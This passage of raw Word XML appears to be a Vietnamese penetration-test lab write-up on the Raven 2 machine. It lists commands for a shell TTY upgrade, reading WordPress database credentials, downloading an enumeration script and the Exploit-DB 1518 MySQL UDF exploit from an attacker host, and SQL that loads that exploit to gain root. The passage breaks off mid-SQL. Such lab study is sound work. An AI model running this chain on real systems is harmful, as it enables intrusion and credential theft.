                      <a:ext cx="5943600" cy="2199005"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9633A5" w14:textId="1F9A610A" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00897848" wp14:editId="34C4ACC3">
            <wp:extent cx="5943600" cy="1074420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11138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44266" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1074420"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Nâng cấp Shell thành TTY tương tác đầy đủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63484749" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E3AF95" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00FB50E7" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB50E7">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>python -c 'import pty; pty.spawn("/bin/bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D3CED4" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Sau khi bắt được Reverse Shell (thường là shell cơ bản, bị hạn chế tính năng), lệnh này sử dụng module pty của Python để tạo ra một TTY shell tương tác đầy đủ (/bin/bash). Việc này giúp gõ lệnh mượt mà hơn, không bị ngắt quãng và cho phép sử dụng các trình soạn thảo văn bản trong terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1278AD5E" w14:textId="3AE3852C" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00EC7ACC" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4578B4BD" wp14:editId="42BA82A3">
            <wp:extent cx="4591050" cy="971550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49417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70825" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4591050" cy="971550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Giai đoạn: Thu thập thông tin nội bộ và Leo thang đặc quyền (Local Enumeration &amp; Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9FB5F5" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Đọc tệp cấu hình để tìm thông tin xác thực nhạy cảm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C14446F" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5092144A" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00EC7ACC" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EC7ACC">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>cat wp-config.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F213D0B" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:lastRenderedPageBreak/>
        <w:t>Giải thích: Đọc nội dung tệp cấu hình lõi của WordPress (wp-config.php) nhằm trích xuất thông tin đăng nhập (username và password) của hệ quản trị cơ sở dữ liệu MySQL, làm tiền đề cho việc thâm nhập sâu hơn.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D77C14" w14:textId="77777777" w:rsidR="00935252" w:rsidRDefault="00935252" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0F509D37" wp14:editId="64254AA2">
            <wp:extent cx="5943600" cy="4347845"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="157495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59096" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4347845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBDC41E" w14:textId="0745AA8F" w:rsidR="00ED562C" w:rsidRPr="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00ED562C">
        <w:t>Quyền này chưa phải root. Vì vậy cần chạy linuxprivchecker.py trên Raven 2 để nó liệt kê các điểm yếu có thể giúp nâng quyền</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159C2241" w14:textId="67E56586" w:rsidR="00935252" w:rsidRDefault="00935252" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6674ABE1" wp14:editId="75CCF623">
            <wp:extent cx="5943600" cy="894715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="23687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7445" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="894715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E002704" w14:textId="681FBE37" w:rsidR="00935252" w:rsidRDefault="00935252" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24D126D0" wp14:editId="6187B136">
            <wp:extent cx="5943600" cy="2316480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="105066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63014" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2316480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5750FE59" w14:textId="77777777" w:rsidR="00ED562C" w:rsidRPr="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00ED562C">
      <w:r w:rsidRPr="00ED562C">
        <w:t>Lệnh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A8501" w14:textId="77777777" w:rsidR="00ED562C" w:rsidRPr="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00ED562C">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED562C">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>service apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350D6E0D" w14:textId="77777777" w:rsidR="00ED562C" w:rsidRPr="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00ED562C">
      <w:r w:rsidRPr="00ED562C">
        <w:t>dùng để khởi động web server Apache trên máy Kali.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CB6D2C" w14:textId="77777777" w:rsidR="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01BD3CDA" w14:textId="61151E67" w:rsidR="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="023C4C09" wp14:editId="5E3D96FC">
            <wp:extent cx="4867275" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="95763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37412" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4867275" cy="381000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6270FD" w14:textId="39BFFEBB" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Rà quét tự động các điểm yếu hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219591B9" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02042AC5" w14:textId="076A4FFF" w:rsidR="00D72ED2" w:rsidRPr="00ED562C" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED562C">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>wget http://192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00ED562C">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00ED562C">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>/linuxprivchecker.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E982C2" w14:textId="693E588F" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích: Tải script tự động rà soát leo thang đặc quyền (linuxprivchecker.py) từ máy người tấn công (192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00ED562C">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00D72ED2">
        <w:t>) xuống máy mục tiêu. Script này sẽ quét toàn bộ hệ thống để tìm kiếm các lỗ hổng cấu hình hoặc phần mềm có khả năng bị lợi dụng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C111C1E" w14:textId="77777777" w:rsidR="00ED562C" w:rsidRDefault="00ED562C" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64E2DDEF" wp14:editId="4E0BB5BE">
            <wp:extent cx="5943600" cy="1363345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="17555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32798" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1363345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6386F940" w14:textId="0BA08138" w:rsidR="00D72ED2" w:rsidRDefault="00ED562C" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3BEDADFA" wp14:editId="28381C40">
            <wp:extent cx="5943600" cy="1339850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="141287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73519" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1339850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích: Biên dịch và chuyển giao mã khai thác MySQL UDF.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111F174" w14:textId="793EC6BC" w:rsidR="00783CE0" w:rsidRDefault="00783CE0" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783CE0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lấy mã exploit 1518 để thử khai thác lỗ hổng leo thang đặc quyền trên Raven 2, sau khi đã có shell quyền thấp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB18C59" w14:textId="13784D05" w:rsidR="00783CE0" w:rsidRDefault="00783CE0" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="092F70A4" wp14:editId="7C01036A">
            <wp:extent cx="3267075" cy="857250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="195637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77768" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3267075" cy="857250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F37FEE9" w14:textId="3C6F5441" w:rsidR="00783CE0" w:rsidRPr="00D72ED2" w:rsidRDefault="00783CE0" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16001563" wp14:editId="0EA72A69">
            <wp:extent cx="5943600" cy="2399665"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="835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328" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2399665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7AD31E" w14:textId="66FBA9B6" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12020BCE" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00783CE0" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00783CE0">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>gcc -g -shared -Wl,-soname,1518.so -o 1518.so 1518.c -lc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B9282" w14:textId="7EF92D2F" w:rsidR="00D72ED2" w:rsidRPr="00242421" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00242421">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>wget http://192.168.56.10</w:t>
      </w:r>
      <w:r w:rsidR="00242421">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00242421">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>/1518.so</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8079AA" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Giải thích:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C85315" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh gcc biên dịch mã nguồn khai thác C (1518.c lấy từ Exploit-DB) thành một tệp thư viện liên kết động (1518.so) trên máy kẻ tấn công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B285526" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh wget được dùng để tải tệp thư viện độc hại này sang máy mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D252788" w14:textId="77777777" w:rsidR="00A456AB" w:rsidRDefault="00242421" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="16A16D38" wp14:editId="6A1D79EC">
            <wp:extent cx="5943600" cy="544195"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="13035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2907" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="544195"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AACAB7" w14:textId="600AD4D5" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00A456AB" w:rsidP="00D72ED2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1A93DB6E" wp14:editId="5F317799">
            <wp:extent cx="5943600" cy="1550035"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="76358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3866" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId28"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1550035"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mục đích: Cấp quyền SUID cho lệnh </w:t>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:t>find</w:t>
      </w:r>
      <w:r w:rsidR="00D72ED2" w:rsidRPr="00D72ED2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> thông qua lỗ hổng MySQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342FBE0D" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>Lệnh thực thi:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269ABE09" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="00D72ED2" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:r w:rsidRPr="00D72ED2">
        <w:t>SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1979136C" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>use mysql;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EAD9E5" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>create table foo(line blob);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B600DB" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>insert into foo values(load_file('/tmp/1518.so'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714BA327" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF07F3" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
        <w:t>create function do_system returns integer soname '1518.so';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A0EDFD" w14:textId="77777777" w:rsidR="00D72ED2" w:rsidRPr="008A4638" w:rsidRDefault="00D72ED2" w:rsidP="00D72ED2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008A4638">
        <w:rPr>
          <w:color w:val="EE0000"/>
        </w:rPr>
